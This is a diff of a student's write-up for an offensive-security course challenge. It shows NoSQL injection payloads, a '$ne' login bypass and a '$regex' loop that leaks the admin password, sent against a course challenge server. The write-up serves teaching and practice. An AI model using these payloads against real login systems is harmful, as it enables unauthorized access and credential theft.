nmaiorana/csgy9223_IntroOffSec/week_12/challenge_week12_README.md

 ```
 ![img.png](NuclearCodeBreak-In.png)

 This one looked pretty straight forward.
-First I had to determine if "admin" was the target username after creating a dummy profile for "nam10102":
+First, I had to determine if "admin" was the target username after creating a dummy profile for "nam10102":

 ```python
 Sending request to http://offsec-chalbroker.osiris.cyber.nyu.edu:10001/api/login with data: {'username': 'admin', 'password': {'$ne': 'nam10102'}}
 {'message': 'Login successful'}
 ```
-Once I was usre "admin" was the target username, I proceeded to leak the password for "admin" using the same looping function (with minor modifications).
+Once I was sure "admin" was the target username, I proceeded to leak the password for "admin" using the same looping function (with minor modifications).

 ```python
 data = {"username": {"$ne": ""}, "password": {"$regex": f"^{leaked_password}{re.escape(char)}"}}